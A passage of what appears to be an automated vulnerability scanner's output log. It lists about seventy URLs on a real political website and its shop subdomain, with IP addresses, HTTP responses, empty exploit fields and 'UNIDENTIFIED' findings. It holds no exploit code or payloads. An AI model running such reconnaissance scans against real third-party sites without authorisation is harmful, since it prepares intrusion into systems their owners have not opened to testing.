2023. _[ - ]::--------------------------------------------------------------------------------------------------------------
2024. |_[ + ] [ 17 / 100 ]-[00:22:30] [ - ]
2025. |_[ + ] Target:: [ http://theredelephants.com/immigration/ ]
2026. |_[ + ] Exploit::
2027. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2028. |_[ + ] More details:: / - / , ISP:
2029. |_[ + ] Found:: UNIDENTIFIED
2030.  
2031. _[ - ]::--------------------------------------------------------------------------------------------------------------
2032. |_[ + ] [ 18 / 100 ]-[00:22:32] [ - ]
2033. |_[ + ] Target:: [ http://theredelephants.com/police/ ]
2034. |_[ + ] Exploit::
2035. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2036. |_[ + ] More details:: / - / , ISP:
2037. |_[ + ] Found:: UNIDENTIFIED
2038.  
2039. _[ - ]::--------------------------------------------------------------------------------------------------------------
2040. |_[ + ] [ 19 / 100 ]-[00:22:34] [ - ]
2041. |_[ + ] Target:: [ http://theredelephants.com/nationalsecurity/ ]
2042. |_[ + ] Exploit::
2043. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2044. |_[ + ] More details:: / - / , ISP:
2045. |_[ + ] Found:: UNIDENTIFIED
2046.  
2047. _[ - ]::--------------------------------------------------------------------------------------------------------------
2048. |_[ + ] [ 20 / 100 ]-[00:22:36] [ - ]
2049. |_[ + ] Target:: [ http://theredelephants.com/protesters/ ]
2050. |_[ + ] Exploit::
2051. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2052. |_[ + ] More details:: / - / , ISP:
2053. |_[ + ] Found:: UNIDENTIFIED
2054.  
2055. _[ - ]::--------------------------------------------------------------------------------------------------------------
2056. |_[ + ] [ 21 / 100 ]-[00:22:38] [ - ]
2057. |_[ + ] Target:: [ http://theredelephants.com/president/ ]
2058. |_[ + ] Exploit::
2059. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2060. |_[ + ] More details:: / - / , ISP:
2061. |_[ + ] Found:: UNIDENTIFIED
2062.  
2063. _[ - ]::--------------------------------------------------------------------------------------------------------------
2064. |_[ + ] [ 22 / 100 ]-[00:22:40] [ - ]
2065. |_[ + ] Target:: [ http://theredelephants.com/about/ ]
2066. |_[ + ] Exploit::
2067. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2068. |_[ + ] More details:: / - / , ISP:
2069. |_[ + ] Found:: UNIDENTIFIED
2070.  
2071. _[ - ]::--------------------------------------------------------------------------------------------------------------
2072. |_[ + ] [ 23 / 100 ]-[00:22:42] [ - ]
2073. |_[ + ] Target:: [ http://theredelephants.com/islam/ ]
2074. |_[ + ] Exploit::
2075. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2076. |_[ + ] More details:: / - / , ISP:
2077. |_[ + ] Found:: UNIDENTIFIED
2078.  
2079. _[ - ]::--------------------------------------------------------------------------------------------------------------
2080. |_[ + ] [ 24 / 100 ]-[00:22:44] [ - ]
2081. |_[ + ] Target:: [ http://theredelephants.com/cnn/ ]
2082. |_[ + ] Exploit::
2083. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2084. |_[ + ] More details:: / - / , ISP:
2085. |_[ + ] Found:: UNIDENTIFIED
2086.  
2087. _[ - ]::--------------------------------------------------------------------------------------------------------------
2088. |_[ + ] [ 25 / 100 ]-[00:22:46] [ - ]
2089. |_[ + ] Target:: [ http://theredelephants.com/obama/ ]
2090. |_[ + ] Exploit::
2091. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2092. |_[ + ] More details:: / - / , ISP:
2093. |_[ + ] Found:: UNIDENTIFIED
2094.  
2095. _[ - ]::--------------------------------------------------------------------------------------------------------------
2096. |_[ + ] [ 26 / 100 ]-[00:22:49] [ - ]
2097. |_[ + ] Target:: [ http://theredelephants.com/trump/ ]
2098. |_[ + ] Exploit::
2099. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2100. |_[ + ] More details:: / - / , ISP:
2101. |_[ + ] Found:: UNIDENTIFIED
2102.  
2103. _[ - ]::--------------------------------------------------------------------------------------------------------------
2104. |_[ + ] [ 27 / 100 ]-[00:22:51] [ - ]
2105. |_[ + ] Target:: [ http://theredelephants.com/russia/ ]
2106. |_[ + ] Exploit::
2107. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2108. |_[ + ] More details:: / - / , ISP:
2109. |_[ + ] Found:: UNIDENTIFIED
2110.  
2111. _[ - ]::--------------------------------------------------------------------------------------------------------------
2112. |_[ + ] [ 28 / 100 ]-[00:22:53] [ - ]
2113. |_[ + ] Target:: [ http://theredelephants.com/home/ ]
2114. |_[ + ] Exploit::
2115. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2116. |_[ + ] More details:: / - / , ISP:
2117. |_[ + ] Found:: UNIDENTIFIED
2118.  
2119. _[ - ]::--------------------------------------------------------------------------------------------------------------
2120. |_[ + ] [ 29 / 100 ]-[00:22:55] [ - ]
2121. |_[ + ] Target:: [ http://theredelephants.com/syria/ ]
2122. |_[ + ] Exploit::
2123. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2124. |_[ + ] More details:: / - / , ISP:
2125. |_[ + ] Found:: UNIDENTIFIED
2126.  
2127. _[ - ]::--------------------------------------------------------------------------------------------------------------
2128. |_[ + ] [ 30 / 100 ]-[00:22:57] [ - ]
2129. |_[ + ] Target:: [ http://theredelephants.com/congress/ ]
2130. |_[ + ] Exploit::
2131. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2132. |_[ + ] More details:: / - / , ISP:
2133. |_[ + ] Found:: UNIDENTIFIED
2134.  
2135. _[ - ]::--------------------------------------------------------------------------------------------------------------
2136. |_[ + ] [ 31 / 100 ]-[00:22:59] [ - ]
2137. |_[ + ] Target:: [ http://theredelephants.com/articles/ ]
2138. |_[ + ] Exploit::
2139. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2140. |_[ + ] More details:: / - / , ISP:
2141. |_[ + ] Found:: UNIDENTIFIED
2142.  
2143. _[ - ]::--------------------------------------------------------------------------------------------------------------
2144. |_[ + ] [ 32 / 100 ]-[00:23:01] [ - ]
2145. |_[ + ] Target:: [ http://theredelephants.com/economy/ ]
2146. |_[ + ] Exploit::
2147. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2148. |_[ + ] More details:: / - / , ISP:
2149. |_[ + ] Found:: UNIDENTIFIED
2150.  
2151. _[ - ]::--------------------------------------------------------------------------------------------------------------
2152. |_[ + ] [ 33 / 100 ]-[00:23:03] [ - ]
2153. |_[ + ] Target:: [ http://theredelephants.com/recount/ ]
2154. |_[ + ] Exploit::
2155. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2156. |_[ + ] More details:: / - / , ISP:
2157. |_[ + ] Found:: UNIDENTIFIED
2158.  
2159. _[ - ]::--------------------------------------------------------------------------------------------------------------
2160. |_[ + ] [ 34 / 100 ]-[00:23:05] [ - ]
2161. |_[ + ] Target:: [ http://theredelephants.com/healthcare/ ]
2162. |_[ + ] Exploit::
2163. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2164. |_[ + ] More details:: / - / , ISP:
2165. |_[ + ] Found:: UNIDENTIFIED
2166.  
2167. _[ - ]::--------------------------------------------------------------------------------------------------------------
2168. |_[ + ] [ 35 / 100 ]-[00:23:07] [ - ]
2169. |_[ + ] Target:: [ http://theredelephants.com/community/ ]
2170. |_[ + ] Exploit::
2171. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2172. |_[ + ] More details:: / - / , ISP:
2173. |_[ + ] Found:: UNIDENTIFIED
2174.  
2175. _[ - ]::--------------------------------------------------------------------------------------------------------------
2176. |_[ + ] [ 36 / 100 ]-[00:23:09] [ - ]
2177. |_[ + ] Target:: [ http://theredelephants.com/ice/ ]
2178. |_[ + ] Exploit::
2179. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2180. |_[ + ] More details:: / - / , ISP:
2181. |_[ + ] Found:: UNIDENTIFIED
2182.  
2183. _[ - ]::--------------------------------------------------------------------------------------------------------------
2184. |_[ + ] [ 37 / 100 ]-[00:23:11] [ - ]
2185. |_[ + ] Target:: [ http://theredelephants.com/ksm/ ]
2186. |_[ + ] Exploit::
2187. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2188. |_[ + ] More details:: / - / , ISP:
2189. |_[ + ] Found:: UNIDENTIFIED
2190.  
2191. _[ - ]::--------------------------------------------------------------------------------------------------------------
2192. |_[ + ] [ 38 / 100 ]-[00:23:13] [ - ]
2193. |_[ + ] Target:: [ http://theredelephants.com/senate/ ]
2194. |_[ + ] Exploit::
2195. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2196. |_[ + ] More details:: / - / , ISP:
2197. |_[ + ] Found:: UNIDENTIFIED
2198.  
2199. _[ - ]::--------------------------------------------------------------------------------------------------------------
2200. |_[ + ] [ 39 / 100 ]-[00:23:15] [ - ]
2201. |_[ + ] Target:: [ http://theredelephants.com/dapl/ ]
2202. |_[ + ] Exploit::
2203. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2204. |_[ + ] More details:: / - / , ISP:
2205. |_[ + ] Found:: UNIDENTIFIED
2206.  
2207. _[ - ]::--------------------------------------------------------------------------------------------------------------
2208. |_[ + ] [ 40 / 100 ]-[00:23:17] [ - ]
2209. |_[ + ] Target:: [ http://theredelephants.com/fbi/ ]
2210. |_[ + ] Exploit::
2211. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2212. |_[ + ] More details:: / - / , ISP:
2213. |_[ + ] Found:: UNIDENTIFIED
2214.  
2215. _[ - ]::--------------------------------------------------------------------------------------------------------------
2216. |_[ + ] [ 41 / 100 ]-[00:23:19] [ - ]
2217. |_[ + ] Target:: [ http://theredelephants.com/bush/ ]
2218. |_[ + ] Exploit::
2219. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2220. |_[ + ] More details:: / - / , ISP:
2221. |_[ + ] Found:: UNIDENTIFIED
2222.  
2223. _[ - ]::--------------------------------------------------------------------------------------------------------------
2224. |_[ + ] [ 42 / 100 ]-[00:23:21] [ - ]
2225. |_[ + ] Target:: [ http://theredelephants.com/espionage/ ]
2226. |_[ + ] Exploit::
2227. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2228. |_[ + ] More details:: / - / , ISP:
2229. |_[ + ] Found:: UNIDENTIFIED
2230.  
2231. _[ - ]::--------------------------------------------------------------------------------------------------------------
2232. |_[ + ] [ 43 / 100 ]-[00:23:23] [ - ]
2233. |_[ + ] Target:: [ http://theredelephants.com/twitter/ ]
2234. |_[ + ] Exploit::
2235. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2236. |_[ + ] More details:: / - / , ISP:
2237. |_[ + ] Found:: UNIDENTIFIED
2238.  
2239. _[ - ]::--------------------------------------------------------------------------------------------------------------
2240. |_[ + ] [ 44 / 100 ]-[00:23:25] [ - ]
2241. |_[ + ] Target:: [ http://theredelephants.com/911/ ]
2242. |_[ + ] Exploit::
2243. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2244. |_[ + ] More details:: / - / , ISP:
2245. |_[ + ] Found:: UNIDENTIFIED
2246.  
2247. _[ - ]::--------------------------------------------------------------------------------------------------------------
2248. |_[ + ] [ 45 / 100 ]-[00:23:27] [ - ]
2249. |_[ + ] Target:: [ http://theredelephants.com/leftists/ ]
2250. |_[ + ] Exploit::
2251. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2252. |_[ + ] More details:: / - / , ISP:
2253. |_[ + ] Found:: UNIDENTIFIED
2254.  
2255. _[ - ]::--------------------------------------------------------------------------------------------------------------
2256. |_[ + ] [ 46 / 100 ]-[00:23:29] [ - ]
2257. |_[ + ] Target:: [ http://theredelephants.com/buttons/ ]
2258. |_[ + ] Exploit::
2259. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2260. |_[ + ] More details:: / - / , ISP:
2261. |_[ + ] Found:: UNIDENTIFIED
2262.  
2263. _[ - ]::--------------------------------------------------------------------------------------------------------------
2264. |_[ + ] [ 47 / 100 ]-[00:23:31] [ - ]
2265. |_[ + ] Target:: [ http://theredelephants.com/hollywood/ ]
2266. |_[ + ] Exploit::
2267. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2268. |_[ + ] More details:: / - / , ISP:
2269. |_[ + ] Found:: UNIDENTIFIED
2270.  
2271. _[ - ]::--------------------------------------------------------------------------------------------------------------
2272. |_[ + ] [ 48 / 100 ]-[00:23:33] [ - ]
2273. |_[ + ] Target:: [ http://theredelephants.com/hot/ ]
2274. |_[ + ] Exploit::
2275. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2276. |_[ + ] More details:: / - / , ISP:
2277. |_[ + ] Found:: UNIDENTIFIED
2278.  
2279. _[ - ]::--------------------------------------------------------------------------------------------------------------
2280. |_[ + ] [ 49 / 100 ]-[00:23:35] [ - ]
2281. |_[ + ] Target:: [ http://theredelephants.com/oscars/ ]
2282. |_[ + ] Exploit::
2283. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2284. |_[ + ] More details:: / - / , ISP:
2285. |_[ + ] Found:: UNIDENTIFIED
2286.  
2287. _[ - ]::--------------------------------------------------------------------------------------------------------------
2288. |_[ + ] [ 50 / 100 ]-[00:23:37] [ - ]
2289. |_[ + ] Target:: [ http://theredelephants.com/trending/ ]
2290. |_[ + ] Exploit::
2291. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2292. |_[ + ] More details:: / - / , ISP:
2293. |_[ + ] Found:: UNIDENTIFIED
2294.  
2295. _[ - ]::--------------------------------------------------------------------------------------------------------------
2296. |_[ + ] [ 51 / 100 ]-[00:23:38] [ - ]
2297. |_[ + ] Target:: [ http://theredelephants.com/popular/ ]
2298. |_[ + ] Exploit::
2299. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, , IP:104.196.67.80:80
2300. |_[ + ] More details:: / - / , ISP:
2301. |_[ + ] Found:: UNIDENTIFIED
2302.  
2303. _[ - ]::--------------------------------------------------------------------------------------------------------------
2304. |_[ + ] [ 52 / 100 ]-[00:23:40] [ - ]
2305. |_[ + ] Target:: [ http://theredelephants.com/cart/ ]
2306. |_[ + ] Exploit::
2307. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2308. |_[ + ] More details:: / - / , ISP:
2309. |_[ + ] Found:: UNIDENTIFIED
2310.  
2311. _[ - ]::--------------------------------------------------------------------------------------------------------------
2312. |_[ + ] [ 53 / 100 ]-[00:23:42] [ - ]
2313. |_[ + ] Target:: [ https://shop.theredelephants.com/collections/tees ]
2314. |_[ + ] Exploit::
2315. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2316. |_[ + ] More details:: / - / , ISP:
2317. |_[ + ] Found:: UNIDENTIFIED
2318.  
2319. _[ - ]::--------------------------------------------------------------------------------------------------------------
2320. |_[ + ] [ 54 / 100 ]-[00:23:45] [ - ]
2321. |_[ + ] Target:: [ https://shop.theredelephants.com/collections/men ]
2322. |_[ + ] Exploit::
2323. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2324. |_[ + ] More details:: / - / , ISP:
2325. |_[ + ] Found:: UNIDENTIFIED
2326.  
2327. _[ - ]::--------------------------------------------------------------------------------------------------------------
2328. |_[ + ] [ 55 / 100 ]-[00:23:47] [ - ]
2329. |_[ + ] Target:: [ https://shop.theredelephants.com/products/fascists ]
2330. |_[ + ] Exploit::
2331. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2332. |_[ + ] More details:: / - / , ISP:
2333. |_[ + ] Found:: UNIDENTIFIED
2334.  
2335. _[ - ]::--------------------------------------------------------------------------------------------------------------
2336. |_[ + ] [ 56 / 100 ]-[00:23:49] [ - ]
2337. |_[ + ] Target:: [ https://shop.theredelephants.com/collections/crew ]
2338. |_[ + ] Exploit::
2339. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2340. |_[ + ] More details:: / - / , ISP:
2341. |_[ + ] Found:: UNIDENTIFIED
2342.  
2343. _[ - ]::--------------------------------------------------------------------------------------------------------------
2344. |_[ + ] [ 57 / 100 ]-[00:23:51] [ - ]
2345. |_[ + ] Target:: [ http://theredelephants.com/2077-2/ ]
2346. |_[ + ] Exploit::
2347. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2348. |_[ + ] More details:: / - / , ISP:
2349. |_[ + ] Found:: UNIDENTIFIED
2350.  
2351. _[ - ]::--------------------------------------------------------------------------------------------------------------
2352. |_[ + ] [ 58 / 100 ]-[00:23:53] [ - ]
2353. |_[ + ] Target:: [ http://theredelephants.com/harvard-university/ ]
2354. |_[ + ] Exploit::
2355. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2356. |_[ + ] More details:: / - / , ISP:
2357. |_[ + ] Found:: UNIDENTIFIED
2358.  
2359. _[ - ]::--------------------------------------------------------------------------------------------------------------
2360. |_[ + ] [ 59 / 100 ]-[00:23:56] [ - ]
2361. |_[ + ] Target:: [ http://theredelephants.com/marie-antrumpette/ ]
2362. |_[ + ] Exploit::
2363. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2364. |_[ + ] More details:: / - / , ISP:
2365. |_[ + ] Found:: UNIDENTIFIED
2366.  
2367. _[ - ]::--------------------------------------------------------------------------------------------------------------
2368. |_[ + ] [ 60 / 100 ]-[00:23:58] [ - ]
2369. |_[ + ] Target:: [ http://theredelephants.com/2877-2/ ]
2370. |_[ + ] Exploit::
2371. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2372. |_[ + ] More details:: / - / , ISP:
2373. |_[ + ] Found:: UNIDENTIFIED
2374.  
2375. _[ - ]::--------------------------------------------------------------------------------------------------------------
2376. |_[ + ] [ 61 / 100 ]-[00:24:00] [ - ]
2377. |_[ + ] Target:: [ http://theredelephants.com/mainstream-media/ ]
2378. |_[ + ] Exploit::
2379. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2380. |_[ + ] More details:: / - / , ISP:
2381. |_[ + ] Found:: UNIDENTIFIED
2382.  
2383. _[ - ]::--------------------------------------------------------------------------------------------------------------
2384. |_[ + ] [ 62 / 100 ]-[00:24:02] [ - ]
2385. |_[ + ] Target:: [ http://theredelephants.com/1st-ammendment/ ]
2386. |_[ + ] Exploit::
2387. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2388. |_[ + ] More details:: / - / , ISP:
2389. |_[ + ] Found:: UNIDENTIFIED
2390.  
2391. _[ - ]::--------------------------------------------------------------------------------------------------------------
2392. |_[ + ] [ 63 / 100 ]-[00:24:04] [ - ]
2393. |_[ + ] Target:: [ http://theredelephants.com/political-correctness/ ]
2394. |_[ + ] Exploit::
2395. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2396. |_[ + ] More details:: / - / , ISP:
2397. |_[ + ] Found:: UNIDENTIFIED
2398.  
2399. _[ - ]::--------------------------------------------------------------------------------------------------------------
2400. |_[ + ] [ 64 / 100 ]-[00:24:06] [ - ]
2401. |_[ + ] Target:: [ http://theredelephants.com/antigun-california/ ]
2402. |_[ + ] Exploit::
2403. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2404. |_[ + ] More details:: / - / , ISP:
2405. |_[ + ] Found:: UNIDENTIFIED
2406.  
2407. _[ - ]::--------------------------------------------------------------------------------------------------------------
2408. |_[ + ] [ 65 / 100 ]-[00:24:08] [ - ]
2409. |_[ + ] Target:: [ http://theredelephants.com/1994-2/ ]
2410. |_[ + ] Exploit::
2411. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2412. |_[ + ] More details:: / - / , ISP:
2413. |_[ + ] Found:: UNIDENTIFIED
2414.  
2415. _[ - ]::--------------------------------------------------------------------------------------------------------------
2416. |_[ + ] [ 66 / 100 ]-[00:24:10] [ - ]
2417. |_[ + ] Target:: [ http://theredelephants.com/government-agencies/ ]
2418. |_[ + ] Exploit::
2419. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2420. |_[ + ] More details:: / - / , ISP:
2421. |_[ + ] Found:: UNIDENTIFIED
2422.  
2423. _[ - ]::--------------------------------------------------------------------------------------------------------------
2424. |_[ + ] [ 67 / 100 ]-[00:24:12] [ - ]
2425. |_[ + ] Target:: [ http://theredelephants.com/author/windycityfan/ ]
2426. |_[ + ] Exploit::
2427. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2428. |_[ + ] More details:: / - / , ISP:
2429. |_[ + ] Found:: UNIDENTIFIED
2430.  
2431. _[ - ]::--------------------------------------------------------------------------------------------------------------
2432. |_[ + ] [ 68 / 100 ]-[00:24:14] [ - ]
2433. |_[ + ] Target:: [ http://theredelephants.com/tag/election/ ]
2434. |_[ + ] Exploit::
2435. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2436. |_[ + ] More details:: / - / , ISP:
2437. |_[ + ] Found:: UNIDENTIFIED
2438.  
2439. _[ - ]::--------------------------------------------------------------------------------------------------------------
2440. |_[ + ] [ 69 / 100 ]-[00:24:16] [ - ]
2441. |_[ + ] Target:: [ http://theredelephants.com/electoral-college/ ]
2442. |_[ + ] Exploit::
2443. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2444. |_[ + ] More details:: / - / , ISP:
2445. |_[ + ] Found:: UNIDENTIFIED
2446.  
2447. _[ - ]::--------------------------------------------------------------------------------------------------------------
2448. |_[ + ] [ 70 / 100 ]-[00:24:18] [ - ]
2449. |_[ + ] Target:: [ http://theredelephants.com/trumps-cabinet/ ]
2450. |_[ + ] Exploit::
2451. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2452. |_[ + ] More details:: / - / , ISP:
2453. |_[ + ] Found:: UNIDENTIFIED
2454.  
2455. _[ - ]::--------------------------------------------------------------------------------------------------------------
2456. |_[ + ] [ 71 / 100 ]-[00:24:20] [ - ]
2457. |_[ + ] Target:: [ https://shop.theredelephants.com/products/communism-kills ]
2458. |_[ + ] Exploit::
2459. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2460. |_[ + ] More details:: / - / , ISP:
2461. |_[ + ] Found:: UNIDENTIFIED
2462.  
2463. _[ - ]::--------------------------------------------------------------------------------------------------------------
2464. |_[ + ] [ 72 / 100 ]-[00:24:22] [ - ]
2465. |_[ + ] Target:: [ http://theredelephants.com/womens-march/ ]
2466. |_[ + ] Exploit::
2467. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2468. |_[ + ] More details:: / - / , ISP:
2469. |_[ + ] Found:: UNIDENTIFIED
2470.  
2471. _[ - ]::--------------------------------------------------------------------------------------------------------------
2472. |_[ + ] [ 73 / 100 ]-[00:24:24] [ - ]
2473. |_[ + ] Target:: [ http://theredelephants.com/tag/riots/ ]
2474. |_[ + ] Exploit::
2475. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2476. |_[ + ] More details:: / - / , ISP:
2477. |_[ + ] Found:: UNIDENTIFIED
2478.  
2479. _[ - ]::--------------------------------------------------------------------------------------------------------------
2480. |_[ + ] [ 74 / 100 ]-[00:24:26] [ - ]
2481. |_[ + ] Target:: [ http://theredelephants.com/1261-2/ ]
2482. |_[ + ] Exploit::
2483. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2484. |_[ + ] More details:: / - / , ISP:
2485. |_[ + ] Found:: UNIDENTIFIED
2486.  
2487. _[ - ]::--------------------------------------------------------------------------------------------------------------
2488. |_[ + ] [ 75 / 100 ]-[00:24:28] [ - ]
2489. |_[ + ] Target:: [ http://theredelephants.com/foreign-policy/ ]
2490. |_[ + ] Exploit::
2491. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2492. |_[ + ] More details:: / - / , ISP:
2493. |_[ + ] Found:: UNIDENTIFIED
2494.  
2495. _[ - ]::--------------------------------------------------------------------------------------------------------------
2496. |_[ + ] [ 76 / 100 ]-[00:24:30] [ - ]
2497. |_[ + ] Target:: [ http://theredelephants.com/white-house/ ]
2498. |_[ + ] Exploit::
2499. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2500. |_[ + ] More details:: / - / , ISP:
2501. |_[ + ] Found:: UNIDENTIFIED
2502.  
2503. _[ - ]::--------------------------------------------------------------------------------------------------------------
2504. |_[ + ] [ 77 / 100 ]-[00:24:32] [ - ]
2505. |_[ + ] Target:: [ http://theredelephants.com/tag/sjw/ ]
2506. |_[ + ] Exploit::
2507. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2508. |_[ + ] More details:: / - / , ISP:
2509. |_[ + ] Found:: UNIDENTIFIED
2510.  
2511. _[ - ]::--------------------------------------------------------------------------------------------------------------
2512. |_[ + ] [ 78 / 100 ]-[00:24:34] [ - ]
2513. |_[ + ] Target:: [ http://theredelephants.com/iraq-war/ ]
2514. |_[ + ] Exploit::
2515. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2516. |_[ + ] More details:: / - / , ISP:
2517. |_[ + ] Found:: UNIDENTIFIED
2518.  
2519. _[ - ]::--------------------------------------------------------------------------------------------------------------
2520. |_[ + ] [ 79 / 100 ]-[00:24:36] [ - ]
2521. |_[ + ] Target:: [ http://theredelephants.com/viral-videos/ ]
2522. |_[ + ] Exploit::
2523. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2524. |_[ + ] More details:: / - / , ISP:
2525. |_[ + ] Found:: UNIDENTIFIED
2526.  
2527. _[ - ]::--------------------------------------------------------------------------------------------------------------
2528. |_[ + ] [ 80 / 100 ]-[00:24:38] [ - ]
2529. |_[ + ] Target:: [ http://theredelephants.com/bernie-sanders/ ]
2530. |_[ + ] Exploit::
2531. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2532. |_[ + ] More details:: / - / , ISP:
2533. |_[ + ] Found:: UNIDENTIFIED
2534.  
2535. _[ - ]::--------------------------------------------------------------------------------------------------------------
2536. |_[ + ] [ 81 / 100 ]-[00:24:39] [ - ]
2537. |_[ + ] Target:: [ http://theredelephants.com/episodes-page/ ]
2538. |_[ + ] Exploit::
2539. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, , IP:104.196.67.80:80
2540. |_[ + ] More details:: / - / , ISP:
2541. |_[ + ] Found:: UNIDENTIFIED
2542.  
2543. _[ - ]::--------------------------------------------------------------------------------------------------------------
2544. |_[ + ] [ 82 / 100 ]-[00:24:41] [ - ]
2545. |_[ + ] Target:: [ https://shop.theredelephants.com/pages/sizing-returns ]
2546. |_[ + ] Exploit::
2547. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
2548. |_[ + ] More details:: / - / , ISP:
2549. |_[ + ] Found:: UNIDENTIFIED
2550.  
2551. _[ - ]::--------------------------------------------------------------------------------------------------------------
2552. |_[ + ] [ 83 / 100 ]-[00:24:43] [ - ]
2553. |_[ + ] Target:: [ http://theredelephants.com/tag/meme/ ]
2554. |_[ + ] Exploit::
2555. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2556. |_[ + ] More details:: / - / , ISP:
2557. |_[ + ] Found:: UNIDENTIFIED
2558.  
2559. _[ - ]::--------------------------------------------------------------------------------------------------------------
2560. |_[ + ] [ 84 / 100 ]-[00:24:45] [ - ]
2561. |_[ + ] Target:: [ http://theredelephants.com/tag/commifornia/ ]
2562. |_[ + ] Exploit::
2563. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2564. |_[ + ] More details:: / - / , ISP:
2565. |_[ + ] Found:: UNIDENTIFIED
2566.  
2567. _[ - ]::--------------------------------------------------------------------------------------------------------------
2568. |_[ + ] [ 85 / 100 ]-[00:24:47] [ - ]
2569. |_[ + ] Target:: [ http://theredelephants.com/tag/creep/ ]
2570. |_[ + ] Exploit::
2571. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2572. |_[ + ] More details:: / - / , ISP:
2573. |_[ + ] Found:: UNIDENTIFIED
2574.  
2575. _[ - ]::--------------------------------------------------------------------------------------------------------------
2576. |_[ + ] [ 86 / 100 ]-[00:24:49] [ - ]
2577. |_[ + ] Target:: [ http://theredelephants.com/tag/violence/ ]
2578. |_[ + ] Exploit::
2579. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
2580. |_[ + ] More details:: / - / , ISP:
2581. |_[ + ] Found:: UNIDENTIFIED
2582.  
2583. _[ - ]::--------------------------------------------------------------------------------------------------------------
